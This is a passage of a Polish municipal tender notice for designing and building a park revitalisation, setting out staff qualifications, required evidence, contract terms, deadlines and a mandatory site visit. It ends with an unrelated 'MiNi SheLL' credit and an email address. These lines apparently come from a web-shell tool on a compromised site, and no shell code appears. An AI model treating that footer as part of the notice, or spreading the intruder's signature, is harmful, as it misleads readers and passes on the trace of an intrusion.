względem przyrodniczym (parki, skwery, promenady)<br/><br/>W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany warunek musi być spełniony co najmniej przez jednego z Wykonawców.<br/><br/>b) dysponuje lub będzie dysponował następującymi osobami skierowanymi do realizacji zamówienia publicznego :<br/>1)	Kierownik Budowy (branża konstrukcyjno – budowlana): <br/> 1 osoba posiadająca uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej oraz posiadająca co najmniej 5 – letnie doświadczenie zawodowe w pełnieniu samodzielnej funkcji technicznej kierownika budowy, licząc od daty ich uzyskania oraz posiadająca doświadczenie na stanowisku kierownika budowy przy wykonaniu w ciągu ostatnich 5 lat przed upływem terminu składania ofert co najmniej jednej roboty budowlanej o wartości co najmniej 3 000 000,00 zł brutto polegającej na tworzeniu lub rewitalizacji terenów zieleni, której zakres obejmował: budowę placu zabaw, budowę oświetlenia oraz nasadzenia drzew i krzewów. <br/><br/>Przez pojęcie „tereny zieleni” Zamawiający rozumie tereny ogólnodostępne i zorganizowane pod względem przyrodniczym (parki, skwery, promenady);<br/><br/>2)	Kierownik robót (w branży sanitarnej/hydrotechnicznej/melioracyjnej):<br/>1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności sanitarnej/hydrotechnicznej/melioracyjnej oraz posiadająca doświadczenie na stanowisku kierownika robót przy realizacji co najmniej jednej roboty budowlanej, której zakres obejmował budowę/przebudowę otwartego zbiornika. <br/><br/>3)	Kierownik robót (w branży drogowej): <br/> 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynierii drogowej;<br/><br/>4)	Kierownik robót (w branży elektrycznej):<br/> 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/><br/>5)	Koordynator ds. zieleni: <br/>1 osobę posiadająca wykształcenie wyższe w specjalności architekt krajobrazu lub wykształcenie wyższe w specjalności ogrodnictwo, lub wykształcenie wyższe w specjalności leśnictwo lub sztuka ogrodowa lub ukończone studia podyplomowe w tym zakresie;<br/><br/>6)	Projektant (w specjalności architektonicznej):<br/>1 osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej oraz posiadająca doświadczenie w projektowaniu co najmniej jednego zagospodarowania terenu wraz z zielenią o powierzchni nie mniejszej niż 1 ha;<br/><br/>7)	Projektant (w specjalności konstrukcyjno - budowlanej): <br/>1 osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno - budowlanej;<br/><br/>8)	Projektant (w specjalności sanitarnej/hydrotechnicznej/melioracyjnej): <br/>1osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności sanitarnej/hydrotechnicznej/melioracyjnej oraz posiadająca doświadczenie w projektowaniu co najmniej jednego otwartego zbiornika;<br/><br/>9)	Projektant (w specjalności drogowej): <br/> 1osobę posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności inżynierii drogowej;<br/><br/>10)Projektant (w specjalności elektrycznej): <br/> 1 osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/><br/>11)	Architekt zieleni: <br/>1 osoba posiadająca wykształcenie wyższe w specjalności architekta krajobrazu lub ukończone studia podyplomowe w tym zakresie oraz posiadająca co najmniej 5 – letnie doświadczenie zawodowe w powyższym zakresie oraz wykonała w okresie ostatnich 5 lat przed upływem terminu składania ofert co najmniej jeden projekt zagospodarowania terenu o powierzchni nie mniejszej niż 1 ha. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych :<br/>a)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz, których roboty te zostały wykonane, o treści odpowiadającej załącznikowi nr 9 do SWZ z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz, którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty,<br/><br/>b)	wykazu osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także z zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 10 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku :<br/>a)	ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy;<br/>b)	Do oferty wspólnej dołączają pełnomocnictwo;<br/>Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję, itp.<br/>c)	dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni Wykonawcy (zgodnie z załącznikiem nr 6 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Istotne dla stron postanowienia oraz określenie warunków wprowadzenia zmian zostały opisane we wzorze umowy - załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/reda</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-04 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wymaga odbycia wizji lokalnej.<br/>Zamawiający informuje, że złożenie oferty wymaga odbycia wizji lokalnej przez Wykonawcę rozumianej jako oględziny działki potwierdzonej protokołem. Termin wizji lokalnej: 27.05.2024 r. godz. 12:00.<br/>Osoba do kontaktu: Magdalena Bartczak tel. 506 763 195<br/>Zamawiający, zgodnie z art. 226 ust. 1 pkt. 18) ustawy Pzp, odrzuci ofertę Wykonawcy jeżeli zostanie złożona bez odbycia wizji lokalnej.<br/><br/><br/>2. Wykonawca składa oświadczenie o tym, że nie podlega wykluczeniu na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/><br/>3.Zamówienie uzyskało dofinansowanie z programu POLSKI ŁAD: <br/>Program Inwestycji Strategicznych edycja 8 - Promesa Inwestycyjna Banku Gospodarstwa Krajowego nr Edycja8/2023/1842/PolskiLad z dnia 11 października 2023 r.<br/>Wykonawca będzie stosować się do wszelkich przepisów i wytycznych związanych z dofinansowaniem z Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych.<br/>W związku z powyższym wszystkie dokumenty wytworzone przez Wykonawcę w związku z realizacją zadania, muszą zawierać obowiązujący zestaw znaków graficznych, zgodnie z wytycznymi Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych.<br/>Wykonawca będzie wspierał Zamawiającego w realizacji obowiązków wynikających z dofinansowania z Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych.

Creat By MiNi SheLL
Email: jattceo@gmail.com